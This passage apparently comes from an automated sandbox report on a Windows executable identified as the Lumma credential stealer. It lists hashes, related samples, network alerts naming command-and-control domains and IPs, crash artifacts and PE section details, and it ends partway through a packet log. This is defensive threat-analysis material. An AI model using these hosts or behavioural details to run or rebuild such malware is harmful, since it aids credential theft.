                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      00:52:05API Interceptor2x Sleep call for process: file.exe modified
                                      00:52:26API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.21.53.8SoftWare.exeGet hashmaliciousLummaCBrowse
                                        SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                          file.exeGet hashmaliciousLummaCBrowse
                                            SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                              file.exeGet hashmaliciousLummaCBrowse
                                                file.exeGet hashmaliciousLummaCBrowse
                                                  SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                          104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                          • www.valvesoftware.com/legal.htm

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          SoftWare(2).exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          SoftWare(2).exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSASL OTSL 2 ship's Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 104.26.13.205
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          https://totalcanterbury0.sharefile.com/public/share/web-034ada86e7d04d74Get hashmaliciousUnknownBrowse
                                                          • 172.67.74.152
                                                          arm5.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 1.13.112.124
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.79.35
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          SoftWare(2).exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.46.170
                                                          Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.htmlGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395Get hashmaliciousHTMLPhisherBrowse
                                                          • 1.1.1.1
                                                          AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          arm5.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 104.117.28.226
                                                          arm7.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 104.124.6.21
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          SoftWare(2).exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.102.49.254

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254
                                                          SoftWare.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254
                                                          SoftWare(2).exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254
                                                          SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254
                                                          FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254
                                                          20Listen.emlGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.21.53.8
                                                          • 104.102.49.254

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_2f26e4b65edfc9809a16d7533fcfcfa7c28d99cc_852b229c_6a2bb52a-8ce2-4c81-ac10-6151ce28c804\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.0288199864711824
                                                          Encrypted:false
                                                          SSDEEP:192:Ph6Gq5MszGvkQPlktS0BU/fI3juFjnzuiFdZ24IO8TVB:/1kQN6ZBU/YjozuiFdY4IO8X
                                                          MD5:E8F5BB7E5F5DA5BF11B990E3150BDBEA
                                                          SHA1:0F00FAF4A71DB0CDD04F2BA02D563658020463F0
                                                          SHA-256:3C44FE2DEFB4A5CCE197D69A3A70626E1F8D859E388DF5E715CC8DDE50609FD1
                                                          SHA-512:0B995D057BD893FDF7EF65F106BB24EF2339E19E58E85A96D27681408EF5ABB8D73C835C53B0377980491FCDA5BC34A93E3CEB41F14D49A0C05BB380A0B0623C
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.5.5.1.2.8.4.9.5.1.1.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.5.5.1.3.0.4.7.9.5.0.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.2.b.b.5.2.a.-.8.c.e.2.-.4.c.8.1.-.a.c.1.0.-.6.1.5.1.c.e.2.8.c.8.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.5.d.e.c.1.6.-.5.7.d.2.-.4.4.a.d.-.9.7.f.a.-.d.8.7.2.8.8.8.3.e.b.5.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.4.c.-.0.0.0.1.-.0.0.1.4.-.a.8.d.e.-.2.e.c.f.f.4.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.9.c.1.9.9.c.7.2.0.a.2.e.1.0.6.8.2.2.d.e.f.b.a.0.3.2.c.2.e.b.9.0.f.9.6.9.9.d.a.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA12D.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Mon Oct 14 04:52:09 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):282316
                                                          Entropy (8bit):1.47926559278303
                                                          Encrypted:false
                                                          SSDEEP:768:YnVRABtr2f0k8qFYIBbki7r/qBt03SonQSXCwFvj8Y:YVI8KIBbXqBt0ionSwFh
                                                          MD5:50E8EFCBBB02323B5C471604E595F5D0
                                                          SHA1:033560388EEF1B3FF42463D0D8F1B5F4C0D9C7FF
                                                          SHA-256:5E48F30588085CB723FF15448330AD16D8239FD3212E5DA7BDE72E532B35BCC7
                                                          SHA-512:4C35817C50B5E2FFABFB1190E01A7D0BC7F1505A7AD32AACDA387E4A4BE606A07F886F3C7523D324DD57DC8057C87428004BF56B98C626B8C9EACCD3CF0B87BD
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... .......y..g........................T...........T....&..........<...........`.......8...........T...........HJ..............P'..........<)..............................................................................eJ.......)......GenuineIntel............T.......L...r..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA787.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8292
                                                          Entropy (8bit):3.6880305510308826
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJFCI6f6Y9MSU9rVgmfBGedprm89bQusfvsAQm:R6lXJH6f6YWSU9rVgmfZPQtfz
                                                          MD5:47725824D9747DAF62937A33D150A84B
                                                          SHA1:AAE2A555CC6DD61EE3BCA52214ADFD2B83904BFC
                                                          SHA-256:2476F49A2EA7AABDED88B9F9977D9DF00CA1880938DDA851740D776F947056FF
                                                          SHA-512:8AC93514B994198013FFE531087F36179A8B1ECCD9317DE35672C2F5D311168D2DBA9A2C062FE63473D35460CD9E9D71B640B441147FF10B1BB6F2A34382D6D4
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.8.8.<./.P.i.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA814.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4542
                                                          Entropy (8bit):4.42167074576792
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zscJg77aI99SWpW8VY/Ym8M4JjlF4+q8CtkiOTd:uIjfaI7rz7V/JsdjOTd
                                                          MD5:B0EB039BBA02F01B8D2D230762A36344
                                                          SHA1:9689E8C295337C87A3F0214ED7FA5E7B60443A26
                                                          SHA-256:EF5753BD7AFFB10EC459825CE4BC18975DFDA70D7BE7A5BEC5E1E4CFFD8CA999
                                                          SHA-512:BFBF7BC10AFC9A192F92C0EAE7AFE6C7D53E2C179CD1A04714A56F265138AE9BB6B6CCA3D515C4717CB30F0C219EE17E257F525857CC693DA04E28BD7857730A
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542634" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.465308991916192
                                                          Encrypted:false
                                                          SSDEEP:6144:AIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb3:FXD94+WlLZMM6YFH1+3
                                                          MD5:9083EB01645F54765CCB6D70E2DCA4DC
                                                          SHA1:44A83CD3B16541706D19E2DEE62E7007603E2E3B
                                                          SHA-256:601B38CE29BE37B39D93D8E772990DEC6F85F29323DA86198EC2A868CE42A745
                                                          SHA-512:07DD5441EBB44DA04439875D26CFD7A65D1D0B809342821D1B84E019535362AB4BB3F9A76BBEC3698420AA983D518E0C3D68F0DE05D30B453F970E3C26C6A6D0
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................2..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.5382012064967485
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:file.exe
                                                          File size:2'963'456 bytes
                                                          MD5:e6f6b8cea53e7f4747e424f1617f3393
                                                          SHA1:59c199c720a2e106822defba032c2eb90f9699da
                                                          SHA256:95b1cfb989f22fc872400433acaa047fc01be081433137307523e4d116390598
                                                          SHA512:dbf6884718d3d08964897c5e002a7316081a6d38d4b68dc0220863eacc9a6f6108af7fa7dbfcac11a6a5008cc79a61db8d73daa628e7c3f6581c5973b7c66d3d
                                                          SSDEEP:49152:gWMmSUIIBPsnQjJqwBowbUX8Xg8WBYHbfoPjivt:gmSUIIBPsnYJ1BoeUXWg8X7wLiv
                                                          TLSH:08D53B73B5057ACFD44F57749527CE82985E0BF58B208CCBA828A4BE7D63CC119B9D28
                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................0...........@...........................0.....Y+....@.................................W...k..

                                                          File Icon

                                                          Icon Hash:90cececece8e8eb0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x70b000
                                                          Entrypoint Section:.taggant
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp 00007EFF18804A8Ah
                                                          movhps xmm5, qword ptr [00000000h]
                                                          add cl, ch
                                                          add byte ptr [eax], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          0x10000x5d0000x25e000a46e0d6fc8a3ceb21203fd8572987c9False0.9995874587458746data7.9847073555245185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          uinrpldy0x600000x2aa0000x2aa0007b80793f2123004c04a2698650b36a60unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          bdkjvfmn0x30a0000x10000x6003c8d0d8e539eaecb983a38d6adc32282False0.5364583333333334data4.7813212125482005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .taggant0x30b0000x30000x2200054525355e8232a223e36678352cb116False0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                          Imports

                                                          DLLImport
                                                          kernel32.dlllstrcpy

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-14T06:52:05.178120+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.4615541.1.1.153UDP
                                                          2024-10-14T06:52:05.189242+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.4537661.1.1.153UDP
                                                          2024-10-14T06:52:05.200339+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.4631691.1.1.153UDP
                                                          2024-10-14T06:52:05.211010+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.4532091.1.1.153UDP
                                                          2024-10-14T06:52:05.221679+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.4586281.1.1.153UDP
                                                          2024-10-14T06:52:05.233741+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.4585541.1.1.153UDP
                                                          2024-10-14T06:52:05.250603+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.4505471.1.1.153UDP
                                                          2024-10-14T06:52:05.267741+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.4511531.1.1.153UDP
                                                          2024-10-14T06:52:06.634065+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449730104.102.49.254443TCP
                                                          2024-10-14T06:52:07.578747+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.53.8443TCP
                                                          2024-10-14T06:52:07.578747+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.53.8443TCP
                                                          2024-10-14T06:52:08.724141+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732104.21.53.8443TCP
                                                          2024-10-14T06:52:08.724141+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.53.8443TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 14, 2024 06:52:05.302964926 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:05.303052902 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:05.303147078 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:05.308773994 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:05.308809042 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.038789034 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.038965940 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.042638063 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.042666912 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.043072939 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.086677074 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.091890097 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.135484934 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.634102106 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.634133101 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.634202957 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.634224892 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.634254932 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.634305000 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.634341002 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.634341002 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.634341955 CEST49730443192.168.2.4104.102.49.254
